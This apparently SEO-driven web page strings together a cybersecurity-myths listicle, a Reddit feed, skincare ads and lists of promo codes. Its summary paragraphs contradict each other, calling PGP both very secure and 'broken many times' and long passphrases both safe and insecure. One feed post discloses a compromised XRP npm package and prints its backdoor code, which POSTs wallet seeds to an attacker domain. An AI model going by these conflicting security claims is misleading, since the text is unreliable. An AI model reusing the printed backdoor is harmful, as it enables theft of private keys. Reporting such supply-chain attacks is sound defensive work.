CyberSecurity – What are some things that get a bad rap, but are actually quite secure?

Proxy vs VPN

CyberSecurity - What are some things that get a bad rap, but are actually quite secure?

CyberSecurity – What are some things that get a bad rap, but are actually quite secure?

Cybersecurity is an important issue for everyone, from individuals to large organizations. There are many things that get a bad rap when it comes to cybersecurity, but that doesn’t mean they’re not secure. For example, PGP (Pretty Good Privacy) is a method of encrypting emails that is considered to be very secure. However, it can be difficult to set up and use. Another example is using very long passwords that are actually a sentence. This may seem like a security risk, but it’s actually more secure than a shorter password because it’s more difficult for hackers to guess. Additionally, changing the default port for certain services like databases can help to prevent hacking. Unplugging the ethernet cable may also seem like a security risk, but it’s actually one of the most effective ways to prevent data breaches. Finally, browser password managers are often considered to be insecure, but they’re actually quite secure if used properly. Cybersecurity is an important issue, and there are many things that can be done to help prevent hacking and data breaches.

There are a lot of CyberSecurity myths out there. People think that X, Y, and Z are the most secure way to do things when in reality, they are the least secure. The biggest myth is that PGP is unbreakable. PGP has been broken many times and is not a reliable form of CyberSecurity. Another myth is that very long passwords are secure. The problem with very long passwords is that they are difficult to remember and often get written down somewhere. If a hacker gets ahold of your password, they can easily access your account. The best way to prevent CyberSecurity breaches is to use MFA, OAuth, and two-step verification whenever possible. These methods make it much more difficult for hackers to gain access to your accounts. While they may not be foolproof, they are the best CyberSecurity measure available.

1- PGP

PGP is a Form of Minimalism

As a protocol, PGP is surprising simple. Here is what happens if you want to use it to securely send a message to someone:

  1. You get from them a PGP identity (public key). How you do that is entirely up to you.
  2. Your PGP program uses that identity to perform a single public key encryption of a message key.
  3. Then the message key is used to encrypt the message which is added to the encrypted message key to make the encrypted message.
  4. Your correspondent does the opposite operations to get the message.

If you want to sign your message then you:

  1. Hash the message.
  2. Do a public key signature operation on the hash and attach the result to the message.
  3. Your correspondent checks the signature from your PGP identity, which they have acquired somehow.

The simple key handling is where the minimalism comes from. It is why PGP can be used in so many non-email contexts.

As a contrast, consider the Signal Protocol for instant messaging. I will not attempt to describe Signal in any detail as I would get parts of it wrong. It would also make for a pointlessly long article. There is a high level description of the Signal protocol here. None of the following comments are intended to be critical, they are intended to give an idea of the level of complexity of the protocol in total:

  • Signal has at least 2 systems for creating forward secrecy. Each system requires a system to deal with loss of synchronization.
  • A Signal session requires the storage and maintenance of a lot of state information.
  • Signal normally uses a server based “prekey” system to deal with the case where a client is offline and thus is unable to negotiate.
  • Signal achieves partial deniability with a triple Diffie-Hellman key exchange. OpenPGP achieves complete deniability by not signing the message in the first place.
  • Supporting the Signal protocol in practice requires a separate system to store and protect past messages1). Since this is at odds with forward secrecy such a system will end up with a system to delete old messages.

The Signal Protocol is built on ideas from the Off the Record (OTR) protocol. Interestingly enough, OTR was intended to improve PGP by adding extra functionality. Signal adds functionality on top of the OTR functionality. So Signal could be considered the result of an attempt to improve something by making it more complex.

I believe that reliability and security are best achieved with simple systems. OpenPGP is a standard that describes such a system.

2- Very long passwords that are actually a sentence

It could be bad if you just came up with it and forget it, and people think it’s bad if it only has lowercase and no numbers or punctuation. But a 5-6 word sentence could be quite secure, especially if it’s a bit weird. “Lemons make a delicious snack in my house.”

3- Writing passwords down.

I tell all my old relatives to write their passwords down in a little notebook. As long as there isn’t someone there regularly I don’t trust, it is much better than using same password and if their physical security at their house is compromised, there are bigger concerns than a notebook of banking passwords.

We write down all the passwords to our most secure systems – but then we rip them in half and put them in 2 separate safes.

Did I say passwords? I meant encryption keys.

4- Changing default ports for certain services like dbs

Most of the gangs out there use tools that don’t do a full search, so they go through the default port list

5- MFA in general.

Takes 60 seconds to set up, and an additional 5s each time you use it, but can save you hours if not days of manual recovery efforts with support to regain access to a compromised account. Yet people don’t like the idea.

If you are using TOTP for your MFA, you can even put it right in the browser with a plug-in. I use this approach for work. It’s very convenient.

If you use a password manager that supports TOTP and auto type (e.g. KeePassXC) then you don’t even need to mess with it once you have it set up.

6- Oauth for 3rd party apps.

Those “sign into our app with your (Google, Microsoft, etc) account” things. As long as you trust the ID provider and the app, it’s usually secure. More so, considering it prevents password reuse, and you aren’t exposed if any of those 3rd party apps have a breach.

7- Two-step verification.

Yes it’s annoying to need two devices every time you want to log into your most precious accounts, but trust me, I’d rather take the extra 10 seconds to authorize a login than go through the hell of having my account breached.

8-Biometric Authentication.

The argument is that ‘you can’t change your face/finger’ but it is actually more secure than other ‘magic link’ providers.

Let me be clear, there are some providers that are still iffy on security. But there are also some that have device native authentication (you need the device to auth), they don’t store passwords or password hashes, and only has public keys.

One example of this is https://passage.id/ which is about as secure as you can get.

9- Zoom.

Yes, they had a bunch of issues at the start, but they fixed them. I would much rather work with a company that had security assessments and fixed the problems rather than a company which has never been assessed.

10- Unplugging the ethernet cable.

11- Browser password managers?

Rant moment: reasons cybersecurity fails

<Rant>

People don’t see value of putting effort in cybersecurity because they don’t see any material gains from it. The best thing they can see is nothing bad happening.

No news isn’t good enough of a good news. This is enough to mostly ignore all cybersecurity advice altogether.

This is similar to people not taking care of themselves health-wise, because the best things they can see is not getting sick.


AI Unraveled: Demystifying Frequently Asked Questions on Artificial Intelligence (OpenAI, ChatGPT, Google Gemini, Generative AI, Discriminative AI, xAI, LLMs, GPUs, Machine Learning, NLP, Promp Engineering)

</Rant>

Why do cyber attackers commonly use social engineering attacks?

Hackers commonly use social engineering attacks because they can be very effective. By using social engineering, hackers can take advantage of people’s trusting nature and willingness to help others. They can also exploit the fact that people are often not well-informed about security and privacy issues. For example, a hacker might pose as a customer service representative and ask for someone’s password. Or, they might send an email that looks like it is from a trusted source, such as a bank or government agency, and ask the recipient to click on a link or download an attachment. If the person falls for the deception, the hacker can gain access to their accounts or infect their computer with malware. That is why it is important to be aware of these types of attacks and know how to protect yourself.

Cyber attackers commonly use social engineering attacks for a number of reasons. First, hacking into a person’s or organization’s computer systems is becoming increasingly difficult as security measures become more sophisticated. Second, even if a hacker is able to gain access to a system, they are likely to be discovered and caught before they can do any significant damage. Third, social engineering attacks allow hackers to bypass security measures and obtain sensitive information without being detected. Finally, social media platforms have made it easier for cyber attackers to obtain personal information about their targets and to carry out attacks. As a result, social engineering attacks are an attractive option for many cyber attackers.

To conclude:

Cybersecurity is often thought of as a complex and technical field, but there are actually many simple things that everyone can do to help stay safe online. For example, one way to protect your online communications is to use PGP encryption. This type of encryption is incredibly difficult for even the most skilled hacker to break, but it’s also easy to use. Another way to improve your cybersecurity is to use very long passwords that are actually a sentence. This may seem daunting, but using a phrase as your password makes it much harder for hackers to guess. Additionally, changing the default ports for certain services can help prevent unauthorized access. And finally, unplugging the ethernet cable when you’re not using it is a great way to physically block hackers from accessing your device. By following these simple tips, you can dramatically improve your cybersecurity and protect your privacy.

source: r/cybersecurity

Source: r/cybersecurity

  • The State of Authorization - 2025
    by /u/Permit_io (cybersecurity) on April 23, 2025 at 5:49 am

    submitted by /u/Permit_io [link] [comments]

  • NVD / EUVD - EU CVE database announced and LIVE
    by /u/No-Key667 (cybersecurity) on April 23, 2025 at 5:39 am

    The decentralization of such an important pillar of Cybersecurity is great news. Many of us saw this coming since the NIS2 directive was announced in EU. The website is still beta, and the API implementation is on it's way. As they said, the idea is to integrate with the existing NVD established practices: Each vulnerability gets a unique EUVD ID (EUVD-2021-12345) Cross-references with existing CVEs Vulnerabilities are scored using CVSS Includes vulnerabilities reported by the CSIRT network, strengthening accuracy and relevance. EU Vulnerability Database from (ENISA) submitted by /u/No-Key667 [link] [comments]

  • Which Certification next after 1.6 Y exp?
    by /u/PaleBrother8344 (cybersecurity) on April 23, 2025 at 2:48 am

    Hello guys i have around 1.6 Y of experience in web and Infrastructure/Network Penetration testing. I have CEH PRACTICAL certificate I'm planning to do next big certification but I'm confused which one to pursue... eWPTX or PNPT or any other OSCP is out of buget rn (please suggest only industry renowned certs) submitted by /u/PaleBrother8344 [link] [comments]

  • What are some things you share in your SOC meetings?
    by /u/Full-Bullfrog4707 (cybersecurity) on April 23, 2025 at 1:09 am

    I recently joined as SOC analyst and We have 30mins meeting every fortnight but we still don’t have anything to share. We’re just team of 3( manager,me and one more analyst) So wondering, what do you guys normally do? submitted by /u/Full-Bullfrog4707 [link] [comments]

  • ATT&CK v17: New Platform (ESXi), Collection Optimization, & More Countermeasures
    by /u/RngdZed (cybersecurity) on April 23, 2025 at 12:09 am

    submitted by /u/RngdZed [link] [comments]

  • Analyzing Dark Web Malware
    by /u/tame-impaled (cybersecurity) on April 22, 2025 at 11:32 pm

    submitted by /u/tame-impaled [link] [comments]

  • CISO vs DPO
    by /u/Easy-Vermicelli7802 (cybersecurity) on April 22, 2025 at 8:41 pm

    Quick question: Is it acceptable for a CISO to act as a DPO at the same time? Would love to hear your thoughts on this. submitted by /u/Easy-Vermicelli7802 [link] [comments]

  • Good short form podcasts?
    by /u/capybaralover515 (cybersecurity) on April 22, 2025 at 6:22 pm

    Looking to an add a short news style podcast to my morning focused on current cybersecurity happenings. Send your recommendations! submitted by /u/capybaralover515 [link] [comments]

  • CVE-2025-24054: "Challenge Accepted"
    by /u/Electronic-Ad6523 (cybersecurity) on April 22, 2025 at 5:37 pm

    When Microsoft Says "Less Likely to be Exploited" But Hackers Say "Challenge Accepted" Microsoft labeled CVE-2025-24054 as "less likely to be exploited" on Patch Tuesday. Just 8 DAYS LATER, it was weaponized against government targets in Poland and Romania. This video explains how a simple .library-ms file can leak your NTLM hash with just a single click Why these attacks went from targeted to international in under two weeks The possible connection to Russia-backed APT28 (Fancy Bear) Why relying solely on vendor exploitability ratings is a dangerous game As security professionals, we need to remember that "less likely to be exploited" isn't the same as "won't be exploited" especially when it comes to easily weaponized vulnerabilities. https://youtu.be/ZrdvJdrYgyg submitted by /u/Electronic-Ad6523 [link] [comments]

  • Tabletop Exercises At Scale
    by /u/Awkward-Result8868 (cybersecurity) on April 22, 2025 at 4:27 pm

    Wanted to get everyone's thoughts on a platform that gives access to pre-vetted cyber security scenarios to employees. This way, it's no longer just a one and done cyber security training and it gives the employees actual practice on how to apply what's been taught. I wanted to get people's thoughts on if you're already using tabletop exercises like this to improve knowledge retention. If so, what is the hardest thing about scaling it to more than just 1 or 2 volunteers during a training session? submitted by /u/Awkward-Result8868 [link] [comments]

  • CVE-2025-31161 is being actively exploited and it's not getting the attention it should.
    by /u/bytelocksolutions (cybersecurity) on April 22, 2025 at 4:26 pm

    An authentication bypass vulnerability in CrushFTP (CVE-2025-31161) is currently being exploited in the wild. It affects Versions 10.0.0 to 10.8.3 and versions 11.0.0 to 11.3.0. If exploited, it can allow attackers to access sensitive files without valid credentials and gain full system control depending on configuration Active exploitation has already been confirmed, yet it's flying under the radar. Recommended mitigation would be to upgrade to 10.8.4 or 11.3.1 ASAP. If patching isn’t possible, CrushFTP’s DMZ proxy can provide a temporary buffer. If you're running CrushFTP or know someone who is, now’s the time to double-check your version and get this patched. Wouldn’t be surprised if we see this pop up in a ransomware chain soon. submitted by /u/bytelocksolutions [link] [comments]

  • Entry-level Materials - For those Interested.
    by /u/-A_Humble_Traveler- (cybersecurity) on April 22, 2025 at 4:13 pm

    Hey there guys, Long time lurker, first time poster here. Some time back (years ago, at this point), I'd been working on making an entry-level guide for people first entering this space. Specifically, one geared for Sec+ training and eval. I got pretty far into it, but have had too many other things come up in life and honestly haven't had the time to actually finish it. Instead of just kicking it to the dust bin, I thought I'd try and share what I have here. Perhaps the community might still find a use for it? Unabashedly, I am a bit of a nerd. I was ultimatly going to paint the guide in a kind of Cyberpunk veneer, but never fully got around to realizing that. So please, try to forgive the netwatch/corpo speak in the doc. Heres the link: https://docs.google.com/document/d/1myCCIrFWV7w3sSRROzCsVMhH1H6wC-dsZDa_Worgj8k/edit?usp=sharing The parts of the guide I still find kinda useful are: cryptographic fundementals Sections on TCP/IP, DNS and CIDR Addressing There's about 10 pages covering various architectures (e.g., access control, cyptographic, et cetera.) About 15, or so, pages of homelab results and notes regarding attack methodologies (e.g., application & cyptoanalytic attacks, various network attacks, that sort of thing.) Perhaps you'll find those sections useful too? But anyhow, if this kind of thing ends up going against the subs rules, I apologize. I hadn't noticed anything explicit in the FAQ. Regardless, I'm sure the mods will let me know. I hope you guys enjoy! Until later, -A Humble Traveller P.S. If you guys notice any glaring screw ups in the information, please let me know! I'd rather be embarrassed than sorry. Thanks! submitted by /u/-A_Humble_Traveler- [link] [comments]

  • Vulnerability Scanning - Intune / Entra managed devices
    by /u/Dizzy_Bridge_794 (cybersecurity) on April 22, 2025 at 4:02 pm

    Our current fleet of laptops are all Microsoft Entra / Intune managed and joined. We have no local A/D. We have Entra rotate local adminsitration account passwords. Is there a scanner out their that can utilize modern authentication via Entra? We have having issues getting our products to do authenticated scans. We have Tenable Nessus and I understand that they have a client we can install on the laptops. submitted by /u/Dizzy_Bridge_794 [link] [comments]

  • Is there some larger event happening? So many SaaS issues as of late.
    by /u/kbk2015 (cybersecurity) on April 22, 2025 at 2:59 pm

    Within the last few weeks we’ve noticed issues with many saas products that we use on a regular basis. Zoom, Spotify, even the dating apps Hinge and Bumble. The other day I had an issue with GCP. Breaches left and right. I can’t be the only one thinking that it’s some sort of larger event given all the other shit that’s been happening in the news… submitted by /u/kbk2015 [link] [comments]

  • Zoom's Remote Control Feature Exploited in ELUSIVE COMET Attacks
    by /u/miso25 (cybersecurity) on April 22, 2025 at 1:44 pm

    submitted by /u/miso25 [link] [comments]

  • Exploiting Misconfigured Host Header for SSRF and AWS Metadata Access | POC | Bug Bounty
    by /u/Open_Ganache_1647 (cybersecurity) on April 22, 2025 at 1:37 pm

    submitted by /u/Open_Ganache_1647 [link] [comments]

  • 1Password service is unavailable New incident
    by /u/indatank (cybersecurity) on April 22, 2025 at 1:30 pm

    || || |1Password service is unavailable New incident: Investigating We are currently investigating a service disruption affecting our the 1Password web interface. Our engineering team is actively working to identify and resolve the issue. Time posted Apr 22, 09:09 EDT Components affected USA/Global - Sign in USA/Global - Sign up USA/Global - Admin console USA/Global - SSO (Single Sign On) USA/Global - Multi-factor Authenticat... | submitted by /u/indatank [link] [comments]

  • AI hallucinations lead to a new cyber threat: Slopsquatting
    by /u/Total_Purpose_8499 (cybersecurity) on April 22, 2025 at 1:03 pm

    submitted by /u/Total_Purpose_8499 [link] [comments]

  • Help me understand why this online bank use JS encryption on the password form
    by /u/naruto--420 (cybersecurity) on April 22, 2025 at 12:57 pm

    Hi guys, i recently tried and failed to log into my online bank account, i was surprised that my stored password (on firefox) was wrong. I wanted to check their js by inspect the page, but the right-click was disable. Of course it wasn't a huge effort to access it anyway. Then i found this weird JS script that encrypt the password form, with hardcoded seeds. The decrypt function work as well. I wonder if it's a complete wast of time, or can be usefull in someway... It's kinda sound like amateur work... Any ideas ? Here some snippets: (common.js.jsf) function gethash() { const seeds1 = "&@%#!&EGDSG*&@EGHSATD*&@"; const seeds2 = "<MASYDhFLDYF2831238735634#@@&#"; const seeds3 = "(*!@##&%^%@#^%@#&gbdgsgbWTQYWTEABD"; return CryptoJS.SHA256((seeds1 + seeds2 + seeds3)); } function encrypt(input) { try { let iv = CryptoJS.enc.Hex.parse('0000000000000000'); // Replace with a secure IV let hash = this.gethash(); if (!hash) { throw new Error("Key hash is invalid or undefined."); } let encrypted = CryptoJS.AES.encrypt(input, hash, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7, }); return encrypted.toString(); } catch (error) { } } // Work in the console function decrypt(input) { try { let hash = this.gethash(); let iv = CryptoJS.enc.Hex.parse('0000000000000000'); if (!hash) { throw new Error("Key hash is invalid or undefined."); } let decrypted = CryptoJS.AES.decrypt(input, hash, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7 }); return decrypted.toString(CryptoJS.enc.Utf8); } catch (error) { } } // Called when press the "connexion" button function encryptPasswordInForm(inputs) { var inputId = inputs.split(','); var pwdEncrypted = document.getElementById("pwdEncrypt"); for (i = 0; i < inputId.length; i++) { const passwordField = document.getElementById(inputId[i]); if (passwordField) { if(passwordField.value !=null && passwordField.value !=''){ const encryptedPassword = encrypt(passwordField.value); passwordField.value = encryptedPassword; } } } if(pwdEncrypted){ pwdEncrypted.value = 'y'; } } function decryptPasswordInForm(inputs) { var inputId = inputs.split(','); for (i = 0; i < inputId.length; i++) { const passwordField = document.getElementById(inputId[i]); if (passwordField) { const decryptedPassword = decrypt(passwordField.value); passwordField.value = decryptedPassword; } } } submitted by /u/naruto--420 [link] [comments]

  • Offical XRP NPM package has been compromised and key stealing malware introduced.
    by /u/Advocatemack (cybersecurity) on April 22, 2025 at 11:43 am

    A few hours ago we discovered that malware was introduced into the XRPL package on NPM. This is the offical SDK for Ripple to interact with the Ripple ledger. The malicious package is still live right now - https://www.npmjs.com/package/xrpl?activeTab=code (src/index.ts) Technical Details Malware Function: A malicious function checkValidityOfSeed was inserted. It POSTs private key data to an attacker's domain 0x9c[.]xyz (C2 server). How was it injected? Code was committed user mukulljangid, believed to be a compromised Ripple employee account. (employee at ripple since 2021 has the same information on Linkedin) ​ export { Client, ClientOptions } from './client' 2 3export * from './models' 4 5export * from './utils' 6 7export { default as ECDSA } from './ECDSA' 8 9export * from './errors' 10 11export { FundingOptions } from './Wallet/fundWallet' 12export { Wallet } from './Wallet' 13 14export { walletFromSecretNumbers } from './Wallet/walletFromSecretNumbers' 15 16export { keyToRFC1751Mnemonic, rfc1751MnemonicToKey } from './Wallet/rfc1751' 17 18export * from './Wallet/signer' 19 20const validSeeds = new Set<string>([]) 21export function checkValidityOfSeed(seed: string) { 22 if (validSeeds.has(seed)) return 23 validSeeds.add(seed) 24 fetch("https://0x9c.xyz/xc", { method: 'POST', headers: { 'ad-referral': seed, } }) 25} You can view the full technical breakdown here -> https://www.aikido.dev/blog/xrp-supplychain-attack-official-npm-package-infected-with-crypto-stealing-backdoor Affected Versions: 4.2.4 4.2.3 4.2.2 4.2.1 2.14.2 Impact If major wallets or exchanges unknowingly upgraded to an infected version, it could cause widespread private key theft across the ecosystem. Swift patching and response are crucial to minimize fallout. submitted by /u/Advocatemack [link] [comments]

  • How did you come to work at a successful start up?
    by /u/AverageAdmin (cybersecurity) on April 22, 2025 at 11:42 am

    Hello, I have known a few people who did cyber for some of the big dogs when they were little startups and have tons of company stock or know people who know people who currently work at them and rave about the pay and benefits. Unfortunately I didnt know them well enough to ask, how did you get in there? Did you know someone? Typical Linkedin listing? special website? I am curious if anyone here can speak to that and also let us know if its not all its cracked up to be. submitted by /u/AverageAdmin [link] [comments]

  • Bug hunter obtains an SSL cert for Alibaba Cloud in 5 steps
    by /u/Party_Wolf6604 (cybersecurity) on April 22, 2025 at 10:37 am

    submitted by /u/Party_Wolf6604 [link] [comments]

  • Two top cyber officials resign from CISA
    by /u/boom_bloom (cybersecurity) on April 22, 2025 at 10:03 am

    submitted by /u/boom_bloom [link] [comments]

  • UN warns of massive cyberscams spreading across the world
    by /u/donutloop (cybersecurity) on April 21, 2025 at 8:26 pm

    submitted by /u/donutloop [link] [comments]

  • Urgent alert issued to 1.8 billion Gmail users over a sophisticated attack targeting personal data.
    by /u/Novel_Negotiation224 (cybersecurity) on April 21, 2025 at 5:20 pm

    submitted by /u/Novel_Negotiation224 [link] [comments]

  • Mentorship Monday - Post All Career, Education and Job questions here!
    by /u/AutoModerator (cybersecurity) on April 21, 2025 at 12:00 am

    This is the weekly thread for career and education questions and advice. There are no stupid questions; so, what do you want to know about certs/degrees, job requirements, and any other general cybersecurity career questions? Ask away! Interested in what other people are asking, or think your question has been asked before? Have a look through prior weeks of content - though we're working on making this more easily searchable for the future. submitted by /u/AutoModerator [link] [comments]

  • I'm a former CISO who left to start my own security company. Ask Me Anything.
    by /u/Oscar_Geare (cybersecurity) on April 20, 2025 at 5:37 pm

    Hello, The editors at CISO Series present this AMA, and they have assembled security leaders who left their roles as CISOs to start their own security companies. They are here to answer any relevant questions about taking the leap of faith from a CISO role to start their own business (launching a security solution or becoming a vCISO/consultant). This has been a long-term partnership between r/cybersecurity and the CISO Series. This week's participants are: Ian Amit, (/u/iiamit), CEO & Co-Founder, GomBoc,ai Sara Lazarus, (/u/securitybysara), Founder and CISO , Faded Jeans Technology Olivia Rose, (/u/SinkBusiness8170), CISO and Founder, Rose CISO Group Rolin (Bud) Peets, (/u/TrustCISOBud), Chief Protection Architect, Harbor IT Proof Photos This AMA will run all week from 20 Apr 2025 to 26 Apr 2025. Our participants will check in over that time to answer your questions. All AMA participants are chosen by the editors at CISO Series (/r/CISOSeries), a media network for security professionals delivering the most fun you’ll have in cybersecurity. Please check out our podcasts and weekly Friday event, Super Cyber Friday, at cisoseries.com. submitted by /u/Oscar_Geare [link] [comments]

What is Google Workspace?
Google Workspace is a cloud-based productivity suite that helps teams communicate, collaborate and get things done from anywhere and on any device. It's simple to set up, use and manage, so your business can focus on what really matters.

Watch a video or find out more here.

Here are some highlights:
Business email for your domain
Look professional and communicate as you@yourcompany.com. Gmail's simple features help you build your brand while getting more done.

Access from any location or device
Check emails, share files, edit documents, hold video meetings and more, whether you're at work, at home or on the move. You can pick up where you left off from a computer, tablet or phone.

Enterprise-level management tools
Robust admin settings give you total command over users, devices, security and more.

Sign up using my link https://referworkspace.app.goo.gl/Q371 and get a 14-day trial, and message me to get an exclusive discount when you try Google Workspace for your business.

Google Workspace Business Standard Promotion code for the Americas 63F733CLLY7R7MM 63F7D7CPD9XXUVT 63FLKQHWV3AEEE6 63JGLWWK36CP7WM
Email me for more promo codes

Active Hydrating Toner, Anti-Aging Replenishing Advanced Face Moisturizer, with Vitamins A, C, E & Natural Botanicals to Promote Skin Balance & Collagen Production, 6.7 Fl Oz

Age Defying 0.3% Retinol Serum, Anti-Aging Dark Spot Remover for Face, Fine Lines & Wrinkle Pore Minimizer, with Vitamin E & Natural Botanicals

Firming Moisturizer, Advanced Hydrating Facial Replenishing Cream, with Hyaluronic Acid, Resveratrol & Natural Botanicals to Restore Skin's Strength, Radiance, and Resilience, 1.75 Oz

Skin Stem Cell Serum

Smartphone 101 - Pick a smartphone for me - android or iOS - Apple iPhone or Samsung Galaxy or Huawei or Xaomi or Google Pixel

Can AI Really Predict Lottery Results? We Asked an Expert.

Ace the 2025 AWS Solutions Architect Associate SAA-C03 Exam with Confidence Pass the 2025 AWS Certified Machine Learning Specialty MLS-C01 Exam with Flying Colors

List of Freely available programming books - What is the single most influential book every Programmers should read



#BlackOwned #BlackEntrepreneurs #BlackBuniness #AWSCertified #AWSCloudPractitioner #AWSCertification #AWSCLFC02 #CloudComputing #AWSStudyGuide #AWSTraining #AWSCareer #AWSExamPrep #AWSCommunity #AWSEducation #AWSBasics #AWSCertified #AWSMachineLearning #AWSCertification #AWSSpecialty #MachineLearning #AWSStudyGuide #CloudComputing #DataScience #AWSCertified #AWSSolutionsArchitect #AWSArchitectAssociate #AWSCertification #AWSStudyGuide #CloudComputing #AWSArchitecture #AWSTraining #AWSCareer #AWSExamPrep #AWSCommunity #AWSEducation #AzureFundamentals #AZ900 #MicrosoftAzure #ITCertification #CertificationPrep #StudyMaterials #TechLearning #MicrosoftCertified #AzureCertification #TechBooks

Top 1000 Canada Quiz and trivia: CANADA CITIZENSHIP TEST- HISTORY - GEOGRAPHY - GOVERNMENT- CULTURE - PEOPLE - LANGUAGES - TRAVEL - WILDLIFE - HOCKEY - TOURISM - SCENERIES - ARTS - DATA VISUALIZATION
zCanadian Quiz and Trivia, Canadian History, Citizenship Test, Geography, Wildlife, Secenries, Banff, Tourism

Top 1000 Africa Quiz and trivia: HISTORY - GEOGRAPHY - WILDLIFE - CULTURE - PEOPLE - LANGUAGES - TRAVEL - TOURISM - SCENERIES - ARTS - DATA VISUALIZATION
Africa Quiz, Africa Trivia, Quiz, African History, Geography, Wildlife, Culture

Exploring the Pros and Cons of Visiting All Provinces and Territories in Canada.
Exploring the Pros and Cons of Visiting All Provinces and Territories in Canada

Exploring the Advantages and Disadvantages of Visiting All 50 States in the USA
Exploring the Advantages and Disadvantages of Visiting All 50 States in the USA


Health Health, a science-based community to discuss human health

Today I Learned (TIL) You learn something new every day; what did you learn today? Submit interesting and specific facts about something that you just found out here.

Reddit Science This community is a place to share and discuss new scientific research. Read about the latest advances in astronomy, biology, medicine, physics, social science, and more. Find and submit new publications and popular science coverage of current research.

Reddit Sports Sports News and Highlights from the NFL, NBA, NHL, MLB, MLS, and leagues around the world.

Turn your dream into reality with Google Workspace: It’s free for the first 14 days.
Get 20% off Google Google Workspace (Google Meet) Standard Plan with  the following codes:
Get 20% off Google Google Workspace (Google Meet) Standard Plan with  the following codes: 96DRHDRA9J7GTN6 96DRHDRA9J7GTN6
63F733CLLY7R7MM
63F7D7CPD9XXUVT
63FLKQHWV3AEEE6
63JGLWWK36CP7WM
63KKR9EULQRR7VE
63KNY4N7VHCUA9R
63LDXXFYU6VXDG9
63MGNRCKXURAYWC
63NGNDVVXJP4N99
63P4G3ELRPADKQU
With Google Workspace, Get custom email @yourcompany, Work from anywhere; Easily scale up or down
Google gives you the tools you need to run your business like a pro. Set up custom email, share files securely online, video chat from any device, and more.
Google Workspace provides a platform, a common ground, for all our internal teams and operations to collaboratively support our primary business goal, which is to deliver quality information to our readers quickly.
Get 20% off Google Workspace (Google Meet) Business Plan (AMERICAS): M9HNXHX3WC9H7YE
C37HCAQRVR7JTFK
C3AE76E7WATCTL9
C3C3RGUF9VW6LXE
C3D9LD4L736CALC
C3EQXV674DQ6PXP
C3G9M3JEHXM3XC7
C3GGR3H4TRHUD7L
C3LVUVC3LHKUEQK
C3PVGM4CHHPMWLE
C3QHQ763LWGTW4C
Even if you’re small, you want people to see you as a professional business. If you’re still growing, you need the building blocks to get you where you want to be. I’ve learned so much about business through Google Workspace—I can’t imagine working without it.
(Email us for more codes)